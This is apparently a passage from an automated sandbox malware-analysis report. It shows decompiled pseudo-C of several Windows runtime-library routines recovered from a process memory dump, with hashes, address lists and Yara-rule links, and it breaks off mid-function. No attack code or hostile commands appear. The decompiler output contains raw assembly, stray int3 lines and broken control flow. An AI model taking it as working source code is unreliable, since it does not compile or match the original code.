                                                        • Opcode ID: 77fd511f50988af635205a53736381e81e4c2fd14e52269a3e34e4da15d24eeb
                                                        • Instruction ID: f1f7db43207f69ed3bf703f8b9ca835463d3cd2c876b599ce9e0a2736f8195e8
                                                        • Opcode Fuzzy Hash: 77fd511f50988af635205a53736381e81e4c2fd14e52269a3e34e4da15d24eeb
                                                        • Instruction Fuzzy Hash: E531F3322416549BD721AF54C948B2AB7A8FFC4B15F020F2FE5568B760DB74F840CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480E730, Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 74%
                                                        			E0480E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04819670() < 0) {
					L0482DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x48c7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L047F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0480E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                        0x0480e730
                                                        0x0480e736
                                                        0x0480e738
                                                        0x0480e73d
                                                        0x0480e73e
                                                        0x0480e740
                                                        0x0480e749
                                                        0x0480e765
                                                        0x0480e76a
                                                        0x0480e76b
                                                        0x0480e76c
                                                        0x0480e76d
                                                        0x0480e76e
                                                        0x0480e76f
                                                        0x0480e775
                                                        0x0480e777
                                                        0x0480e77e
                                                        0x0484b675
                                                        0x0480e784
                                                        0x0480e784
                                                        0x0480e789
                                                        0x0480e7a8
                                                        0x0480e7ac
                                                        0x0480e807
                                                        0x0480e7ae
                                                        0x0480e7ae
                                                        0x0480e7b1
                                                        0x0480e7b4
                                                        0x0480e7b9
                                                        0x0480e7c0
                                                        0x0480e7c4
                                                        0x0480e7ca
                                                        0x0480e7cc
                                                        0x00000000
                                                        0x0480e7d3
                                                        0x0480e7d6
                                                        0x00000000
                                                        0x00000000
                                                        0x0480e7ff
                                                        0x0480e802
                                                        0x00000000
                                                        0x00000000
                                                        0x0480e7f9
                                                        0x0480e7fc
                                                        0x00000000
                                                        0x00000000
                                                        0x0480e7f3
                                                        0x0480e7f6
                                                        0x00000000
                                                        0x00000000
                                                        0x0480e7ed
                                                        0x0480e7f0
                                                        0x00000000
                                                        0x00000000
                                                        0x0480e7e7
                                                        0x0480e7ea
                                                        0x00000000
                                                        0x00000000
                                                        0x0484b685
                                                        0x0484b688
                                                        0x00000000
                                                        0x00000000
                                                        0x0484b682
                                                        0x00000000
                                                        0x00000000
                                                        0x0480e7cc
                                                        0x0480e7d9
                                                        0x0480e7dc
                                                        0x0480e7de
                                                        0x0480e7de
                                                        0x0480e7ac
                                                        0x0480e7e4
                                                        0x0480e74b
                                                        0x0480e751
                                                        0x0480e759
                                                        0x0480e761
                                                        0x0480e761

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a8bfb295a5034d7ef879c1f31908ffb2b3ed89086dc56d07a860c929c6b9ae4
                                                        • Instruction ID: d20145162afef7d82ef56ca84da77e88ff202a8ac3faa6e1e315312a48b22539
                                                        • Opcode Fuzzy Hash: 7a8bfb295a5034d7ef879c1f31908ffb2b3ed89086dc56d07a860c929c6b9ae4
                                                        • Instruction Fuzzy Hash: B4315E75A14249AFD744CF58D841B96B7E8FB19314F148A56F904CB381E671FD80CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480BC2C, Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E0480BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x48c6100; // 0x9
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E047F2280(0xd, 0x16bdf1a0);
				_t41 =  *0x48c60f8; // 0x0
				if(_t41 != 0) {
					 *0x48c60f8 =  *_t41;
					 *0x48c60fc =  *0x48c60fc + 0xffff;
				}
				E047EFFB0(_t41, 0x800, 0x16bdf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x48c60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L047F4620(0x48c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x48c6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                        0x0480bc36
                                                        0x0480bc42
                                                        0x0480bc45
                                                        0x0480bc4a
                                                        0x0480bd35
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0480bc50
                                                        0x0480bc50
                                                        0x0480bc58
                                                        0x0480bc5a
                                                        0x0480bc60
                                                        0x00000000
                                                        0x00000000
                                                        0x0484a4f2
                                                        0x0484a4f6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0484a4fc
                                                        0x0480bc79
                                                        0x0480bc7e
                                                        0x0480bc86
                                                        0x0480bd16
                                                        0x0480bd20
                                                        0x0480bd20
                                                        0x0480bc8d
                                                        0x0480bc94
                                                        0x0480bcbd
                                                        0x0480bcca
                                                        0x0480bccb
                                                        0x0480bccc
                                                        0x0480bccd
                                                        0x0480bcce
                                                        0x0480bcd4
                                                        0x0480bcea
                                                        0x0480bcee
                                                        0x0480bcf2
                                                        0x0480bd00
                                                        0x0480bd04
                                                        0x00000000
                                                        0x0480bc96
                                                        0x0480bcab
                                                        0x0480bcaf
                                                        0x0480bd2c
                                                        0x0480bd2c
                                                        0x0480bd09
                                                        0x00000000
                                                        0x0480bd09
                                                        0x0480bcb1
                                                        0x0480bcb5
                                                        0x0480bcbb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0480bcbb

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb1a5dc3ea0565bbbc82452994a47f0af35b2c235b9467d761287eb42c1fcf56
                                                        • Instruction ID: 0d885ef5b050a41dae19e3293be003defd1aa82fd52975f984d0c6a182aee961
                                                        • Opcode Fuzzy Hash: fb1a5dc3ea0565bbbc82452994a47f0af35b2c235b9467d761287eb42c1fcf56
                                                        • Instruction Fuzzy Hash: 5831DF326206159FDB51EF98D8807A6B3A4FB18315F048A79ED54FB281FA78FD058B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04801DB5, Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E04801DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E047FF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L047F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E047FF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                        0x04801dc2
                                                        0x04801dc5
                                                        0x04801dc7
                                                        0x04801dcc
                                                        0x04801dce
                                                        0x04801dd6
                                                        0x04801ddf
                                                        0x04801de0
                                                        0x04801de1
                                                        0x04801de5
                                                        0x04801de8
                                                        0x04801def
                                                        0x04801df0
                                                        0x04801df6
                                                        0x04801df7
                                                        0x04801dfe
                                                        0x04801e1a
                                                        0x00000000
                                                        0x00000000
                                                        0x04801e0b
                                                        0x04801e12
                                                        0x04801e12
                                                        0x04801e00
                                                        0x04801e00
                                                        0x04801e05
                                                        0x04801e1e
                                                        0x04801e23
                                                        0x0484570f
                                                        0x04845713
                                                        0x00000000
                                                        0x00000000
                                                        0x04845719
                                                        0x04845719
                                                        0x04801e2c
                                                        0x04801e2d
                                                        0x04801e2e
                                                        0x04801e2f
                                                        0x04801e31
                                                        0x04801e32
                                                        0x04801e35
                                                        0x04801e3d
                                                        0x04845723
                                                        0x0484573d
                                                        0x0484573d
                                                        0x00000000
                                                        0x04845723
                                                        0x04801e49
                                                        0x04801e4e
                                                        0x04801e4e
                                                        0x04801e09
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                        • Instruction ID: b8d8dbce43e9e589bf211644a2a0c988b92dabe8454b83e22dc4a7ac1c0c62a6
                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                        • Instruction Fuzzy Hash: 1C21A072A10208EFD761CF59CC88EAEBBB9EF85754F108565E901D7350DA31BE41C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D9100, Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E047D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x48af6e8);
				E0482D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E048A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0482D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x48c86c0; // 0x6607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x48c86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E047F2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E048A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0481AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x48cb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x48c84c0;
										if(_t69 >=  *0x48c84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E048A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E047D922A(_t82);
							_t53 = E047F7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E048A8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x48c86c0; // 0x6607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x48c86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x48c86bc;
										_t72 = 0x48c86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E047D9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x48c86c4;
									_t72 = 0x48c86c0;
									L18:
									E04809B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                        0x047d9100
                                                        0x047d9100
                                                        0x047d9100
                                                        0x047d9100
                                                        0x047d9102
                                                        0x047d9107
                                                        0x047d910c
                                                        0x047d9110
                                                        0x047d9115
                                                        0x047d9136
                                                        0x047d9143
                                                        0x048337e4
                                                        0x048337e4
                                                        0x047d9149
                                                        0x047d914e
                                                        0x047d914e
                                                        0x047d9117
                                                        0x047d911d
                                                        0x00000000
                                                        0x00000000
                                                        0x047d911f
                                                        0x047d9125
                                                        0x00000000
                                                        0x047d9151
                                                        0x047d9158
                                                        0x047d915d
                                                        0x047d9161
                                                        0x047d9168
                                                        0x04833715
                                                        0x00000000
                                                        0x047d916e
                                                        0x047d916e
                                                        0x047d9175
                                                        0x047d9177
                                                        0x047d917e
                                                        0x047d917f
                                                        0x047d9182
                                                        0x047d9182
                                                        0x047d9187
                                                        0x047d9187
                                                        0x047d918a
                                                        0x047d918d
                                                        0x047d918f
                                                        0x047d9192
                                                        0x047d9195
                                                        0x047d9198
                                                        0x047d9198
                                                        0x047d9198
                                                        0x047d919a
                                                        0x00000000
                                                        0x00000000
                                                        0x0483371f
                                                        0x04833721
                                                        0x04833727
                                                        0x0483372f
                                                        0x04833733
                                                        0x04833735
                                                        0x04833738
                                                        0x0483373b
                                                        0x0483373d
                                                        0x04833740
                                                        0x00000000
                                                        0x00000000
                                                        0x04833746
                                                        0x04833749
                                                        0x00000000
                                                        0x00000000
                                                        0x0483374f
                                                        0x04833751
                                                        0x00000000
                                                        0x00000000
                                                        0x04833757
                                                        0x04833759
                                                        0x0483375c
                                                        0x0483375c
                                                        0x0483375e
                                                        0x0483375e
                                                        0x04833761
                                                        0x04833764
                                                        0x00000000
                                                        0x00000000
                                                        0x04833766
                                                        0x04833768
                                                        0x048337a3
                                                        0x048337a3
                                                        0x048337a5
                                                        0x048337a7
                                                        0x048337ad
                                                        0x048337b0
                                                        0x048337b2
                                                        0x048337bc
                                                        0x048337c2
                                                        0x048337c2
                                                        0x048337b2
                                                        0x047d9187
                                                        0x047d9187
                                                        0x047d918a
                                                        0x047d918d
                                                        0x047d918f
                                                        0x047d9192
                                                        0x047d9195
                                                        0x00000000
                                                        0x047d9195
                                                        0x00000000
                                                        0x047d9187
                                                        0x0483376a
                                                        0x0483376a
                                                        0x0483376c
                                                        0x0483376c
                                                        0x0483376f
                                                        0x04833775
                                                        0x00000000
                                                        0x00000000
                                                        0x04833777
                                                        0x04833779
                                                        0x00000000
                                                        0x00000000
                                                        0x04833782
                                                        0x04833787
                                                        0x04833789
                                                        0x04833790
                                                        0x04833790
                                                        0x0483378b
                                                        0x0483378b
                                                        0x0483378b
                                                        0x04833792
                                                        0x04833795
                                                        0x04833795
                                                        0x04833798
                                                        0x04833798
                                                        0x0483379b
                                                        0x0483379b
                                                        0x047d91a3
                                                        0x047d91a9
                                                        0x047d91b0
                                                        0x047d91b4
                                                        0x047d91b4
                                                        0x047d91bb
                                                        0x047d91c0
                                                        0x047d91c5
                                                        0x047d91c7
                                                        0x048337da
                                                        0x047d91cd
                                                        0x047d91cd
                                                        0x047d91cd
                                                        0x047d91d2
                                                        0x047d91d5
                                                        0x047d9239
                                                        0x047d9239
                                                        0x047d91d7
                                                        0x047d91db
                                                        0x047d91e1
                                                        0x047d91e7
                                                        0x047d91fd
                                                        0x047d9203
                                                        0x047d921e
                                                        0x047d9223
                                                        0x00000000
                                                        0x047d9223
                                                        0x047d9205
                                                        0x047d9208
                                                        0x047d920c
                                                        0x047d9214
                                                        0x047d9214
                                                        0x047d91e9
                                                        0x047d91e9
                                                        0x047d91ee
                                                        0x047d91f3
                                                        0x047d91f3
                                                        0x047d91f3
                                                        0x047d91e7
                                                        0x00000000
                                                        0x047d91db
                                                        0x047d9187
                                                        0x047d9168

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4e4f2c95dbff726ac66eba58da1585a780395388f1798c698f9a0d1c3a0c6cb
                                                        • Instruction ID: 1c580a46aab503782791fc043afb2e6d61f7d4eceab023636d05b53e7e116b07
                                                        • Opcode Fuzzy Hash: f4e4f2c95dbff726ac66eba58da1585a780395388f1798c698f9a0d1c3a0c6cb
                                                        • Instruction Fuzzy Hash: DE31E8F1A10245DFEB25DF68C548BACBBF1BB4C314F188A59C604A7341D375B980CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047F0050, Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E047F0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x48cd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04809ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0481B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E048A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04809702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x48cb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                        0x047f0055
                                                        0x047f005d
                                                        0x047f0062
                                                        0x047f006c
                                                        0x047f006f
                                                        0x047f0074
                                                        0x047f007a
                                                        0x047f007a
                                                        0x047f0080
                                                        0x047f0080
                                                        0x047f0087
                                                        0x047f008d
                                                        0x047f008f
                                                        0x047f0093
                                                        0x047f0095
                                                        0x047f009b
                                                        0x047f00f8
                                                        0x047f00fb
                                                        0x047f00fc
                                                        0x047f00ff
                                                        0x047f0108
                                                        0x047f0108
                                                        0x047f00a2
                                                        0x047f00a6
                                                        0x047f00b3
                                                        0x047f00bc
                                                        0x047f00c5
                                                        0x047f00ca
                                                        0x0483c01e
                                                        0x00000000
                                                        0x00000000
                                                        0x0483c02d
                                                        0x047f00d5
                                                        0x047f00d9
                                                        0x0483c03d
                                                        0x0483c046
                                                        0x0483c046
                                                        0x047f00df
                                                        0x047f00e2
                                                        0x047f00ea
                                                        0x047f00ef
                                                        0x047f00f2
                                                        0x047f00f6
                                                        0x047f0111
                                                        0x047f0117
                                                        0x047f0117
                                                        0x00000000
                                                        0x047f00f6
                                                        0x047f00d0
                                                        0x047f00d0
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5074d8944432f9e239330bffdd0acc59376588fe4821cc223ba9e681cd80745e
                                                        • Instruction ID: fb3844e6f397903ec60d7d917d2cf66cf02612314287733c2eb6677c044183ff
                                                        • Opcode Fuzzy Hash: 5074d8944432f9e239330bffdd0acc59376588fe4821cc223ba9e681cd80745e
                                                        • Instruction Fuzzy Hash: 1A317C31601A44CFD721CF28C844B56B3E5FF88718F144A69E996C7791EB75B801CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04856C0A, Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E04856C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E047F7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x48c7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L047F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0481F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
